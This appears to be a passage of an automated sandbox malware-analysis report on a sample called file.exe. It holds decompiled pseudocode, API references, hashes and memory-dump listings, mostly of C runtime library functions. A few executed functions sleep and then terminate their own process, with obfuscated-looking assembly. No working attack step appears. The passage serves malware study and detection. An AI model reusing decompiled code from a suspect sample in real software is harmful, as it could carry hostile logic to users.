0x00410c70
0x00410c73
0x00410c75
0x00410c78
0x00410c7d
0x00410c87
0x00410c7f
0x00410c83
0x00410c83
0x00410c97
0x00410c9d
0x00410ca5
0x00000000
0x00410ca7
0x00410ca7
0x00410cab
0x00410cab
0x00410ca5

APIs

GetModuleHandleA.KERNEL32(KERNEL32,0040AE7A), ref: 00410C8D
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00410C9D

Strings

IsProcessorFeaturePresent, xrefs: 00410C97
KERNEL32, xrefs: 00410C88

Memory Dump Source

Source File: 00000000.00000002.248589200.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.248582626.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248640451.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248650930.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248656057.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248667674.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248671620.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: 849291338ce3d63dde9b087aa9bd3a28552f9dc7da4fe46b9535fd13aa592c58
Instruction ID: 2cc87d07ba03b1b782b82d160500d17f1eff63234b3d3f6bb45c75640bbf4e22
Opcode Fuzzy Hash: 849291338ce3d63dde9b087aa9bd3a28552f9dc7da4fe46b9535fd13aa592c58
Instruction Fuzzy Hash: 2FF03030A00A09E2DF142FA1AE0A6AF7E7CBB80702F9105A1D1D6B01D4EF7581F5C69A

Uniqueness

Uniqueness Score: -1.00%

Function 0040DEDE Relevance: 6.1, APIs: 4, Instructions: 103
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0040DEDE(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				char _v20;
				signed int _t54;
				intOrPtr _t56;
				int _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t73;

				_t73 = _a8;
				if(_t73 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t73 != 0) {
						E0040904E( &_v20, __edi, _a16);
						if( *((intOrPtr*)(_v20 + 0x14)) != 0) {
							if(E0040E00F( *_t73 & 0x000000ff,  &_v20) == 0) {
								if(MultiByteToWideChar( *(_v20 + 4), 9, _t73, 1, _a4, 0 | _a4 != 0x00000000) != 0) {
									L10:
									if(_v8 != 0) {
										 *(_v12 + 0x70) =  *(_v12 + 0x70) & 0xfffffffd;
									}
									return 1;
								}
								L21:
								_t54 = E0040747B();
								 *_t54 = 0x2a;
								if(_v8 != 0) {
									_t54 = _v12;
									 *(_t54 + 0x70) =  *(_t54 + 0x70) & 0xfffffffd;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t65 =  *(_t56 + 0xac);
							if(_t65 <= 1 || _a12 < _t65) {
								L17:
								if(_a12 <  *(_t56 + 0xac) || _t73[1] == 0) {
									goto L21;
								} else {
									goto L19;
								}
							} else {
								_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t73, _t65, _a4, 0 | _a4 != 0x00000000);
								_t56 = _v20;
								if(_t58 != 0) {
									L19:
									_t57 =  *(_t56 + 0xac);
									if(_v8 == 0) {
										return _t57;
									}
									 *(_v12 + 0x70) =  *(_v12 + 0x70) & 0xfffffffd;
									return _t57;
								}
								goto L17;
							}
						}
						_t59 = _a4;
						if(_t59 != 0) {
							 *_t59 =  *_t73 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

0x0040dee8
0x0040deef
0x0040df06
0x00000000
0x0040def6
0x0040def8
0x0040df12
0x0040df1d
0x0040df4f
0x0040dfed
0x0040df2d
0x0040df30
0x0040df35
0x0040df35
0x00000000
0x0040df3b
0x0040dfaf
0x0040dfaf
0x0040dfb4
0x0040dfbd
0x0040dfbf
0x0040dfc2
0x0040dfc2
0x00000000
0x0040dfc6
0x0040df51
0x0040df54
0x0040df5d
0x0040df84
0x0040df8d
0x00000000
0x00000000
0x00000000
0x00000000
0x0040df64
0x0040df77
0x0040df7f
0x0040df82
0x0040df94
0x0040df94
0x0040df9d
0x0040df0b
0x0040df0b
0x0040dfa6
0x00000000
0x0040dfa6
0x00000000
0x0040df82
0x0040df5d
0x0040df1f
0x0040df24
0x0040df2a
0x0040df2a
0x00000000
0x0040defa
0x0040defa
0x0040deff
0x0040df03
0x0040df03
0x00000000
0x0040deff
0x0040def8

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0040DF12
__isleadbyte_l.LIBCMT ref: 0040DF46
MultiByteToWideChar.KERNEL32(?,00000009,00000000,?,00000000,00000000,?,?,?,6E49C677,00000000,00000000,?), ref: 0040DF77
MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000001,00000000,00000000,?,?,?,6E49C677,00000000,00000000,?), ref: 0040DFE5

Memory Dump Source

Source File: 00000000.00000002.248589200.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.248582626.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248640451.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248650930.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248656057.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248667674.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248671620.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: efa1c4807faf2de5249cdde7e0ad398816fe84a95a35b08c13bc6bbfd9111492
Instruction ID: 3364307831111e090e90a540cb8b838cdfe72a3ac2f9eac63f3894a4aac76be5
Opcode Fuzzy Hash: efa1c4807faf2de5249cdde7e0ad398816fe84a95a35b08c13bc6bbfd9111492
Instruction Fuzzy Hash: 0D31CE31E00247EFCB20EFA4C884AAA3BA1AF01310F14857AF562AB2D1D334DD54DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00410B74 Relevance: 6.0, APIs: 4, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00410B74(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t28;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E00410465(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E00410555(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E00410A7A(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E004109BF(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

0x00410b79
0x00410b7f
0x00410bf2
0x00000000
0x00410b86
0x00410b86
0x00410b89
0x00410ba4
0x00410ba7
0x00410bc7
0x00410bd9
0x00410ba9
0x00410ba9
0x00410bac
0x00000000
0x00410bae
0x00410bc0
0x00410bc0
0x00410bac
0x00410bf7
0x00410bfb
0x00410b8b
0x00410ba3
0x00410ba3
0x00410b89

APIs

__cftof_l.LIBCMT ref: 00410B9A

Part of subcall function 004109BF: __fltout2.LIBCMT ref: 004109EB

__cftog_l.LIBCMT ref: 00410BC0
__cftoe_l.LIBCMT ref: 00410BF2

Memory Dump Source

Source File: 00000000.00000002.248589200.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.248582626.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248640451.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248650930.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248656057.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248667674.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248671620.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: a00fe7094c665b1aa83b003f8bcb39f1fd7a9ba829c258cca2bc7f148fee25eb
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: 3A117E3204414AFBCF125ED4CC51CEE3F22BB18358F588416FA5859131C77AD9F1AB89

Uniqueness

Uniqueness Score: -1.00%

Function 0040F09B Relevance: 6.0, APIs: 4, Instructions: 31
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 90%

			E0040F09B(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t13;
				intOrPtr _t27;
				intOrPtr _t29;
				void* _t30;
				void* _t31;

				_t31 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ebx;
				_push(0xc);
				_push(0x417148);
				E00408168(__ebx, __edi, __esi);
				_t29 = E0040BD70(__ebx, __edx, _t31);
				_t13 =  *0x418d34; // 0xfffffffe
				if(( *(_t29 + 0x70) & _t13) == 0) {
					L6:
					E00407670(_t22, _t25, _t26, 0xc);
					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
					_t8 = _t29 + 0x6c; // 0x6c
					_t27 =  *0x418e18; // 0x418d40
					 *((intOrPtr*)(_t30 - 0x1c)) = E0040F05D(_t8, _t27);
					 *(_t30 - 4) = 0xfffffffe;
					E0040F105();
				} else {
					_t33 =  *((intOrPtr*)(_t29 + 0x6c));
					if( *((intOrPtr*)(_t29 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t29 =  *((intOrPtr*)(E0040BD70(_t22, __edx, _t33) + 0x6c));
					}
				}
				if(_t29 == 0) {
					E00406BE8(0x20);
				}
				return E004081AD(_t29);
			}

0x0040f09b
0x0040f09b
0x0040f09b
0x0040f09b
0x0040f09b
0x0040f09d
0x0040f0a2
0x0040f0ac
0x0040f0ae
0x0040f0b6
0x0040f0da
0x0040f0dc
0x0040f0e2
0x0040f0e6
0x0040f0e9
0x0040f0f4
0x0040f0f7
0x0040f0fe
0x0040f0b8
0x0040f0b8
0x0040f0bc
0x00000000
0x0040f0be
0x0040f0c3
0x0040f0c3
0x0040f0bc
0x0040f0c8
0x0040f0cc
0x0040f0d1
0x0040f0d9

APIs

__getptd.LIBCMT ref: 0040F0A7

Part of subcall function 0040BD70: __getptd_noexit.LIBCMT ref: 0040BD73
Part of subcall function 0040BD70: __amsg_exit.LIBCMT ref: 0040BD80

__getptd.LIBCMT ref: 0040F0BE
__amsg_exit.LIBCMT ref: 0040F0CC
__lock.LIBCMT ref: 0040F0DC

Memory Dump Source

Source File: 00000000.00000002.248589200.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.248582626.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248640451.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248650930.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248656057.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248667674.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248671620.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: 8ca7ef0c350fca566ba6684c216ff16df0ed23dafa0c33d837cdfb98a3a2b658
Instruction ID: 925462649c196d7ab1147969d9d15b3965408171c252b3ccfbaa8ed3a22b351d
Opcode Fuzzy Hash: 8ca7ef0c350fca566ba6684c216ff16df0ed23dafa0c33d837cdfb98a3a2b658
Instruction Fuzzy Hash: FAF06D32A44B14CAD730BB65D802B8A73A0AF00764F10413FA841BB6D2DB7CAC45CA9E

Uniqueness

Uniqueness Score: -1.00%

Function 00408E9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408E9F() {
				intOrPtr _t5;
				intOrPtr _t6;
				intOrPtr _t10;
				void* _t12;
				intOrPtr _t15;
				intOrPtr* _t16;
				signed int _t19;
				signed int _t20;
				intOrPtr _t26;
				intOrPtr _t27;

				_t5 =  *0x446240;
				_t26 = 0x14;
				if(_t5 != 0) {
					if(_t5 < _t26) {
						_t5 = _t26;
						goto L4;
					}
				} else {
					_t5 = 0x200;
					L4:
					 *0x446240 = _t5;
				}
				_t6 = E0040D6BC(_t5, 4);
				 *0x445220 = _t6;
				if(_t6 != 0) {
					L8:
					_t19 = 0;
					_t15 = 0x418368;
					while(1) {
						 *((intOrPtr*)(_t19 + _t6)) = _t15;
						_t15 = _t15 + 0x20;
						_t19 = _t19 + 4;
						if(_t15 >= 0x4185e8) {
							break;
						}
						_t6 =  *0x445220;
					}
					_t27 = 0xfffffffe;
					_t20 = 0;
					_t16 = 0x418378;
					do {
						_t10 =  *((intOrPtr*)(((_t20 & 0x0000001f) << 6) +  *((intOrPtr*)(0x445120 + (_t20 >> 5) * 4))));
						if(_t10 == 0xffffffff || _t10 == _t27 || _t10 == 0) {
							 *_t16 = _t27;
						}
						_t16 = _t16 + 0x20;
						_t20 = _t20 + 1;
					} while (_t16 < 0x4183d8);
					return 0;
				} else {
					 *0x446240 = _t26;
					_t6 = E0040D6BC(_t26, 4);
					 *0x445220 = _t6;
					if(_t6 != 0) {
						goto L8;
					} else {
						_t12 = 0x1a;
						return _t12;
					}
				}
			}

0x00408e9f
0x00408ea7
0x00408eaa
0x00408eb5
0x00408eb7
0x00000000
0x00408eb7
0x00408eac
0x00408eac
0x00408eb9
0x00408eb9
0x00408eb9
0x00408ec1
0x00408ec8
0x00408ecf
0x00408eef
0x00408eef
0x00408ef1
0x00408efd
0x00408efd
0x00408f00
0x00408f03
0x00408f0c
0x00000000
0x00000000
0x00408ef8
0x00408ef8
0x00408f10
0x00408f11
0x00408f13
0x00408f19
0x00408f2d
0x00408f33
0x00408f3d
0x00408f3d
0x00408f3f
0x00408f42
0x00408f43
0x00408f4f
0x00408ed1
0x00408ed4
0x00408eda
0x00408ee1
0x00408ee8
0x00000000
0x00408eea
0x00408eec
0x00408eee
0x00408eee
0x00408ee8

APIs

__calloc_crt.LIBCMT ref: 00408EC1
__calloc_crt.LIBCMT ref: 00408EDA

Strings

@RD, xrefs: 00408EF1

Memory Dump Source

Source File: 00000000.00000002.248589200.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.248582626.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248640451.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248650930.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248656057.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248667674.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248671620.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: __calloc_crt
String ID: @RD
API String ID: 3494438863-1994911373
Opcode ID: 9501712f4376269ec35644b239256d302f5e92eb67f071fcf933d0219f924180
Instruction ID: cfbf7eaeca6dfb36402b98399007b2dbb8e1c38447a04112b842dd24da090a45
Opcode Fuzzy Hash: 9501712f4376269ec35644b239256d302f5e92eb67f071fcf933d0219f924180
Instruction Fuzzy Hash: 961136317046111BE7249B2DFD412A33282FB86728724063FF510EA3E1EF78C881468C

Uniqueness

Uniqueness Score: -1.00%

Function 0041614E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 88%

			E0041614E(void* __ebx, void* __edx, void* __edi, intOrPtr* __esi, void* __eflags) {
				intOrPtr _t17;
				intOrPtr* _t28;
				void* _t29;

				_t30 = __eflags;
				_t28 = __esi;
				_t26 = __edx;
				_t19 = __ebx;
				 *((intOrPtr*)(__edi - 4)) =  *((intOrPtr*)(_t29 - 0x24));
				E00415C16(__ebx, __edx, __edi, __eflags,  *((intOrPtr*)(_t29 - 0x28)));
				 *((intOrPtr*)(E0040BD70(__ebx, __edx, __eflags) + 0x88)) =  *((intOrPtr*)(_t29 - 0x2c));
				_t17 = E0040BD70(_t19, _t26, _t30);
				 *((intOrPtr*)(_t17 + 0x8c)) =  *((intOrPtr*)(_t29 - 0x30));
				if( *__esi == 0xe06d7363 &&  *((intOrPtr*)(__esi + 0x10)) == 3) {
					_t17 =  *((intOrPtr*)(__esi + 0x14));
					if(_t17 == 0x19930520 || _t17 == 0x19930521 || _t17 == 0x19930522) {
						if( *((intOrPtr*)(_t29 - 0x34)) == 0) {
							_t37 =  *((intOrPtr*)(_t29 - 0x1c));
							if( *((intOrPtr*)(_t29 - 0x1c)) != 0) {
								_t17 = E00415BEF(_t37,  *((intOrPtr*)(_t28 + 0x18)));
								_t38 = _t17;
								if(_t17 != 0) {
									_push( *((intOrPtr*)(_t29 + 0x10)));
									_push(_t28);
									return E00415EE6(_t38);
								}
							}
						}
					}
				}
				return _t17;
			}

0x0041614e
0x0041614e
0x0041614e
0x0041614e
0x00416151
0x00416157
0x00416165
0x0041616b
0x00416173
0x0041617f
0x00416187
0x0041618f
0x004161a3
0x004161a5
0x004161a9
0x004161ae
0x004161b4
0x004161b6
0x004161b8
0x004161bb
0x00000000
0x004161c2
0x004161b6
0x004161a9
0x004161a3
0x0041618f
0x004161c3

APIs

Part of subcall function 00415C16: __getptd.LIBCMT ref: 00415C1C
Part of subcall function 00415C16: __getptd.LIBCMT ref: 00415C2C

__getptd.LIBCMT ref: 0041615D

Part of subcall function 0040BD70: __getptd_noexit.LIBCMT ref: 0040BD73
Part of subcall function 0040BD70: __amsg_exit.LIBCMT ref: 0040BD80

__getptd.LIBCMT ref: 0041616B

Strings

csm, xrefs: 00416179

Memory Dump Source

Source File: 00000000.00000002.248589200.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.248582626.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248640451.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248650930.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248656057.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248667674.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248671620.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: a935c30cd55411eed2351ce7d8e9c1ad7b12a7df9e4901bfa9168f7baf4b6cfa
Instruction ID: 474831be7a2f2d2468342213cfcbba1cf13fe85f3b37322c86b277925fab3e0f
Opcode Fuzzy Hash: a935c30cd55411eed2351ce7d8e9c1ad7b12a7df9e4901bfa9168f7baf4b6cfa
Instruction Fuzzy Hash: 54012834800705EECF389F25D440AEEB3B5EF50311F15442FE44156792DB38DAC5CA99

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: file.exePID: 6088, Parent PID: 5164COMMON

Execution Graph

Execution Coverage:	6.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	19
Total number of Limit Nodes:	0

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0040180C Relevance: 3.0, APIs: 2, Instructions: 50
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 23%

			E0040180C(void* __eflags, void* __fp0, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t11;
				void* _t16;
				intOrPtr* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t22 = __eflags;
				L00401140(0x183e, _t16, _t20, _t21, __eflags, __fp0);
				_t17 = _a4;
				Sleep(0x1388);
				_t11 = E00401381(_t19, _t22, _t17, _a8, _a12,  &_v8); // executed
				if(_t11 != 0) {
					_push(_a16);
					_push(_v8);
					_push(_t11);
					_push(_t17); // executed
					L00401455(0x60, _t19, _t20); // executed
				}
				 *_t17(0xffffffff, 0); // executed
				_t17 = _t17 + 0x60;
				_push(0x60);
				asm("pushad");
				__ecx =  *__esp;
				__esp = __esp + 4;
				return __eax;
			}

0x0040180c
0x00401839
0x0040183e
0x00401846
0x00401854
0x0040185b
0x0040185d
0x00401860
0x00401863
0x00401864
0x00401865
0x00401865
0x0040186e
0x0040187a
0x0040188a
0x0040188b
0x0040188c
0x0040188f
0x004018a2

APIs

Sleep.KERNELBASE(00001388), ref: 00401846
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E

Memory Dump Source

Source File: 00000001.00000002.344535122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
Instruction ID: 439418bc6b8cc85bb90c3f715c5c8777bd26b3ffbf7cafd5698f886abb68661d
Opcode Fuzzy Hash: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
Instruction Fuzzy Hash: DA014F73608208E7DB057A968C41ABA36299B04754F24C137BA13791F1D63DCB12A76B

Uniqueness

Uniqueness Score: -1.00%

Function 00401818 Relevance: 3.0, APIs: 2, Instructions: 45
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401846
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E

Memory Dump Source

Source File: 00000001.00000002.344535122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
Instruction ID: 3ccd72cbf6c862e7ac88a574d3d4d63140f03618044998c1cc11cf15f2003e8a
Opcode Fuzzy Hash: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
Instruction Fuzzy Hash: F5F03133604204E7DB047E96CC41ABA36199B04754F24C537BA13791F1D63DCB12A76B

Uniqueness

Uniqueness Score: -1.00%

Function 00401822 Relevance: 3.0, APIs: 2, Instructions: 44
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 17%

			E00401822(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* _t11;
				intOrPtr* _t17;
				void* _t19;
				void* _t22;

				_t23 = __eflags;
				asm("out 0x95, eax");
				L00401140(0x183e, __ebx, __edi, __esi, __eflags, __fp0);
				_t17 =  *((intOrPtr*)(_t22 + 8));
				Sleep(0x1388);
				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
				if(_t11 != 0) {
					_push( *((intOrPtr*)(_t22 + 0x14)));
					_push( *((intOrPtr*)(_t22 - 4)));
					_push(_t11);
					_push(_t17); // executed
					L00401455(0x60, _t19, __edi); // executed
				}
				 *_t17(0xffffffff, 0); // executed
				_t17 = _t17 + 0x60;
				_push(0x60);
				asm("pushad");
				__ecx =  *__esp;
				__esp = __esp + 4;
				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
				_pop(__edi);
				_pop(__esi);
				_pop(__ebx);
				__esp = __ebp;
				_pop(__ebp);
				return __eax;
			}

0x00401822
0x00401822
0x00401839
0x0040183e
0x00401846
0x00401854
0x0040185b
0x0040185d
0x00401860
0x00401863
0x00401864
0x00401865
0x00401865
0x0040186e
0x0040187a
0x0040188a
0x0040188b
0x0040188c
0x0040188f
0x00401899
0x0040189e
0x0040189f
0x004018a0
0x004018a1
0x004018a1
0x004018a2

APIs

Sleep.KERNELBASE(00001388), ref: 00401846
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E

Memory Dump Source

Source File: 00000001.00000002.344535122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
Instruction ID: 86529ff08739d4d45ab2b2fe3aa627bb4dd9aa569924de5dc1b0fc6937d585b1
Opcode Fuzzy Hash: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
Instruction Fuzzy Hash: FEF03133604204EBDB047E96C841ABA36299B44754F24C537BA13B91F1D63DCB12A76B

Uniqueness

Uniqueness Score: -1.00%

Function 00401826 Relevance: 3.0, APIs: 2, Instructions: 40
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 17%

			E00401826(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* _t8;
				void* _t11;
				intOrPtr* _t17;
				void* _t19;
				void* _t22;

				_t23 = __eflags;
				asm("sbb ebx, ebp");
				L00401140(_t8, __ebx, __edi, __esi, __eflags, __fp0);
				_t17 =  *((intOrPtr*)(_t22 + 8));
				Sleep(0x1388);
				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
				if(_t11 != 0) {
					_push( *((intOrPtr*)(_t22 + 0x14)));
					_push( *((intOrPtr*)(_t22 - 4)));
					_push(_t11);
					_push(_t17); // executed
					L00401455(0x60, _t19, __edi); // executed
				}
				 *_t17(0xffffffff, 0); // executed
				_t17 = _t17 + 0x60;
				_push(0x60);
				asm("pushad");
				__ecx =  *__esp;
				__esp = __esp + 4;
				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
				_pop(__edi);
				_pop(__esi);
				_pop(__ebx);
				__esp = __ebp;
				_pop(__ebp);
				return __eax;
			}

0x00401826
0x00401826
0x00401839
0x0040183e
0x00401846
0x00401854
0x0040185b
0x0040185d
0x00401860
0x00401863
0x00401864
0x00401865
0x00401865
0x0040186e
0x0040187a
0x0040188a
0x0040188b
0x0040188c
0x0040188f
0x00401899
0x0040189e
0x0040189f
0x004018a0
0x004018a1
0x004018a1
0x004018a2

APIs

Sleep.KERNELBASE(00001388), ref: 00401846
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E

Memory Dump Source

Source File: 00000001.00000002.344535122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
Instruction ID: 61297dcd7f948f961e89af5f5716b1062d194a974c17104e1ab0fce138cf61ec
Opcode Fuzzy Hash: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
Instruction Fuzzy Hash: C4F04F33604208A7DB04BE96CC41AAA3719AB04754F248537BB13791E1DA3DCB12A72B

Uniqueness

Uniqueness Score: -1.00%

Function 00401834 Relevance: 3.0, APIs: 2, Instructions: 39
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

